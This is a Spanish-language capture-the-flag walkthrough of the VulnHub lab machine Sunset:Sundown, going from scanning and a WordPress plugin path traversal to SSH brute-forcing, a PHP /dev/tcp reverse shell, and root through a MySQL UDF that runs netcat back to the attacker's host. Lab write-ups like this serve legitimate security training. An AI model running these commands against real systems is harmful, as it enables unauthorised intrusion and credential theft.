[VULNHUB] Sunset:Sundown

Hoy vamos a hackear la maquina de Vulnhub llamada Potato. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/sunset-sundown,530/
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.20 Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-11 11:17 CEST Nmap scan report for 192.168.1.20 Host is up (0.00028s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 90:ba:81:81:b6:ec:5b:33:87:f8:73:3d:82:ca:e5:dd (RSA) | 256 e1:bd:70:79:91:22:86:c8:e1:f5:80:ed:4a:b7:dd:ad (ECDSA) |_ 256 9f:03:af:27:89:8a:8e:b5:c0:68:05:44:74:d3:6b:d7 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-generator: WordPress 5.4.2 | http-robots.txt: 1 disallowed entry |_/wp-admin/ |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Sundown – Just another WordPress site Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.23 seconds
    Nmap nos muestra que el robots.txt tiene una entrada disallowed: /wp-admin. Exploramos con wpscan para ver si vemos algo interesante!
    ~ > wpscan --url http://192.168.1.20 _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.6 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.38 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] robots.txt found: http://192.168.1.20/robots.txt | Interesting Entries: | - /wp-admin/ | - /wp-admin/admin-ajax.php | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.1.20/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce ss [+] WordPress readme found: http://192.168.1.20/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://192.168.1.20/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.1.20/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10). | Found By: Rss Generator (Passive Detection) | - http://192.168.1.20/feed/, https://wordpress.org/?v=5.4.2 | - http://192.168.1.20/comments/feed/, https://wordpress.org/?v=5.4.2 [+] Enumerating All Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] wp-with-spritz | Location: http://192.168.1.20/wp-content/plugins/wp-with-spritz/ | Latest Version: 1.0 (up to date) | Last Updated: 2015-08-20T20:15:00.000Z | | Found By: Urls In Homepage (Passive Detection) | Confirmed By: Urls In 404 Page (Passive Detection) | | Version: 4.2.4 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://192.168.1.20/wp-content/plugins/wp-with-spritz/readme.txt [+] Finished: Fri Sep 11 11:18:58 2020 [+] Requests Done: 52 [+] Cached Requests: 7 [+] Data Sent: 11.176 KB [+] Data Received: 300.866 KB [+] Memory used: 194.34 MB [+] Elapsed time: 00:00:08
    Vemos que hay un plugin: wp-with-spritz Buscamos mas informacion sobre el y vemos que es vulnerable[1]. Lo ponemos en practica :) http://192.168.1.20/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.p hp?url=/../../../../etc/passwd En el fichero /etc/passwd podemos ver que existe el usuario llamado carlos, asi que miramos si podemos obtener su password usando hydra.
    ~ > hydra -l carlos -P /usr/share/wordlists/rockyou.txt 192.168.1.20 ssh Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-11 11:26:55 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking ssh://192.168.1.20:22/ [22][ssh] host: 192.168.1.20 login: carlos password: carlos 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-11 11:27:06
    Vemos que la password es igual que el username. Nos logueamos!
  • Low Shell
  • ~ > ssh carlos@192.168.1.20 carlos@192.168.1.20's password: Linux sundown 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Aug 3 19:39:26 2020 from 192.168.100.139 carlos@sundown:~$
  • user.txt
  • carlos@sundown:~$ cat local.txt 28f84888f6bd690e321cba14659b32f2 carlos@sundown:~$
    Queremos ver el fichero wp-config.php que suele tener la password para conectarse al mysql, sin embargo nuestro usuario carlos no tiene permisos, pero si que los tiene www-data. Creamos un .php accesible desde la web que nos facilite una reverse shell, y asi obtendremos el usuario www-data que nos permitira ver el fichero.
    carlos@sundown:/var/www/html/wordpress$ nano e.php carlos@sundown:/var/www/html/wordpress$ cat e.php & /dev/tcp/192.168.1.59/5555 0>&1'"); ?> carlos@sundown:/var/www/html/wordpress$
    Ponemos nc a la escucha.
    ~ > nc -nlvp 5555 listening on [any] 5555 ...
    Accedemos a http://192.168.1.20/e.php
    ~ > nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.1.59] from (UNKNOWN) [192.168.1.20] 35710 bash: cannot set terminal process group (503): Inappropriate ioctl for device bash: no job control in this shell www-data@sundown:/var/www/html/wordpress$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@sundown:/var/www/html/wordpress$
    Ahora que ya somos usuario www-data, miramos el fichero wp-config.php!
    www-data@sundown:/var/www/html/wordpress$ wp-config.php /** MySQL database password */ define( 'DB_PASSWORD', 'VjFSQ2IyRnNUak5pZWpCTENnPT0K' );
    Vemos que tenemos la password para conectarnos como root al mysql. Por otro lado, vemos que el usuario mysql tiene permisos de root!
  • Privilege Escalation
  • Usaremos UDF[2] para obtener una reverse shell a traves de mysql y asi tener una shell con privilegios de root. Descargamos y compilamos.
    wget http://0xdeadbeef.info/exploits/raptor_udf2.c gcc -g -c raptor_udf2.c gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
    Movemos el fichero raptor_udf2.o a nuestro servidor web para que sea accesible.
    sudo mv raptor_udf2.o /var/www/html
    Nos descargamos el binario de nc, y el fichero raptor_udf2.o que hemos movido antes a nuestro servidor web.
    cd /tmp curl -o nc http://192.168.1.59/nc curl -o raptor_udf2.o http://192.168.1.59/raptor_udf2.o
    Y ahora empezamos los pasos para obtener la reverse shell. Nos conectamos al mysql.
    carlos@sundown:/tmp$ mysql -u root -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 19 Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
    Seleccionamos la BBDD mysql.
    MariaDB [(none)]> use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed
    Ejecutamos las siguientes sentencias.
    MariaDB [mysql]> create table foo(line blob); Query OK, 0 rows affected (0.029 sec) MariaDB [mysql]> insert into foo values(load_file('/tmp/raptor_udf2.so')); Query OK, 1 row affected (0.005 sec) MariaDB [mysql]> show variables like '%plugin%'; +-----------------+---------------------------------------------+ | Variable_name | Value | +-----------------+---------------------------------------------+ | plugin_dir | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ | | plugin_maturity | gamma | +-----------------+---------------------------------------------+ 2 rows in set (0.001 sec) MariaDB [mysql]> select * from foo into dumpfile "/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so"; Query OK, 1 row affected (0.000 sec) MariaDB [mysql]> create function do_system returns integer soname 'raptor_udf2.so'; Query OK, 0 rows affected (0.000 sec) MariaDB [mysql]> select * from mysql.func; +-----------+-----+----------------+----------+ | name | ret | dl | type | +-----------+-----+----------------+----------+ | do_system | 2 | raptor_udf2.so | function | +-----------+-----+----------------+----------+ 1 row in set (0.000 sec)
    Una vez hecho los pasos anteriores, ponemos nc a la escucha.
    ~ > nc -nlvp 4444 listening on [any] 4444 ...
    Por ultimo en el mysql ejecutamos:
    MariaDB [mysql]> select do_system('/tmp/nc 192.168.1.59 4444 -e /bin/bash &');
    Y obtenemos nuestra shell con privilegios :)
    ~ > nc -nlvp 4444 listening on [any] 4444 ... connect to [192.168.1.59] from (UNKNOWN) [192.168.1.20] 49818 id uid=0(root) gid=0(root) groups=0(root)
  • root.txt
  • cd /root ls proof.txt cat proof.txt _____,,,\//,,\\,/, /-- --- --- ----- ///--- --- -- - ---- o////- ---- --- -- !!//o/--- -- -- o*) !///,~,,\\,\/,,/,//,, o!*!o'(\ /\ | ! o ",) \/\ /\ / \/\ o !o! !!| \/ \/ / ( * ( o!'; |\ \ / o o ! * !` | \ / \ o | o 'o| | : \ / * o !*!': |o| / / (o''| `| : / / ! *|'` \|/ \\ ' !o!':\ \\ \ ( ('| \ `._______/ ////\\\,,\///,,,,\,/oO._* o !*!'` `.________/ ---- -- ------- - -oO*OoOo (o''| / -------- ------ 'oO*OoO!*|'o!! \ ------- -- - ---- --* oO*OoO *!'| ' / --- - ----- ---- - oO*OoO!!':o!' / - - ----- - -- - *--oO*OoOo!` / \\\\\,,,\\,//////,\,,\\\/,,,\,,ejm/AMC 510252fabb4b7e7dddd7373b7b3da3e8 Thanks for playing - Felipe Winsnes (@whitecr0wz)
  • End
  • Y con esto ya seriamos root de la maquina. [1]https://www.exploit-db.com/exploits/44544 [2]https://redteamnation.com/mysql-user-defined-functions/